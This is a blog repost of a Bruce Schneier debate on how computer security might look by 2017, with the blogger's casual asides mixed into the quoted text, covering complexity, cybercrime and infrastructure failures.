Bruce Schneier: Predictions are easy and difficult. Roy Amara of the Institute for the Future once said:
Cool quote :)
"We tend to overestimate the effect of a technology in the short run and underestimate the effect in the long run."
Moore's Law is easy: In 10 years, computers will be 100 times more powerful. My desktop will fit into my cell phone, we'll have gigabit wireless connectivity everywhere, and personal networks will connect our computing devices and the remote services we subscribe to. Other aspects of the future are much more difficult to predict. I don't think anyone can predict what the emergent properties of 100x computing power will bring: new uses for computing, new paradigms of communication. A 100x world will be different, in ways that will be surprising.
I don't think anyone can predict what the emergent properties of 100x computing power will bring: new uses for computing, new paradigms of communication. A 100x world will be different, in ways that will be surprising.Throughout history and into the future, the one constant is human nature. There hasn't been a new crime invented in millennia. Fraud, theft, impersonation and counterfeiting are perennial problems that have been around since the beginning of society.
During the last 10 years, these crimes have migrated into cyberspace (Gosh! ask me... how I tackled it this year :(( :O)
The nature of the attacks will be different: the targets, tactics and results. Security is both a trade-off and an arms race, a balance between attacker and defender, and changes in technology upset that balance.
Technology might make one particular tactic more effective, or one particular security technology cheaper and more ubiquitous. Or a new emergent application might become a favored target.
I don't see anything by 2017 that will fundamentally alter this. Do you?
- You can't turn shovelware into reliable software by patching it a whole lot.
- You shouldn't mix production systems with non-production systems.
- You actually have to know what's going on in your networks.
- If you run your computers with an open execution runtime model you'll always get viruses, spyware and Trojan horses.
- You can pass laws about locking barn doors after horses have left, but it won't put the horses back in the barn.
- Security has to be designed in, as part of a system plan for reliability, rather than bolted on afterward.
I've been pretty dismissive of the concepts of cyberwar and cyberterror. That dismissal was mostly motivated by my observation that the patchworked and kludgy nature of most computer systems acts as a form of defense in its own right, and that real-world attacks remain more cost-effective and practical for terror purposes.
I'd like to officially modify my position somewhat: I believe it's increasingly likely that we'll suffer catastrophic failures in critical infrastructure systems by 2017. It probably won't be terrorists that do it, though. HAHA!
More likely, we'll suffer some kind of horrible outage because a critical system was connected to a non-critical system that was connected to the Internet so someone could get to MySpace -- and that ancillary system gets a piece of malware. Or it'll be some incomprehensibly complex software, layered with Band-Aids and patches, that topples over when some "merely curious" hacker pushes the wrong e-button. We've got some bad-looking trend lines; all the indicators point toward a system that is more complex, less well-understood and more interdependent. With infrastructure like that, who needs enemies?
You're worried criminals will continue to penetrate into cyberspace, and I'm worried complexity, poor design and mismanagement will be there to meet them.
Bruce Schneier: I think we've already suffered that kind of critical systems failure. The August 2003 blackout that covered much of northeastern United States and Canada -- 50 million people -- was caused by a software bug.
I don't disagree that things will continue to get worse. Complexity is the worst enemy of security, and the Internet -- and the computers and processes connected to it -- is getting more complex all the time. So things are getting worse, even though security technology is improving. One could say those critical insecurities are another emergent property of the 100x world of 2017.
Read more at one of mah fav blogs.....A blog on security and security technology:
Schneier on Security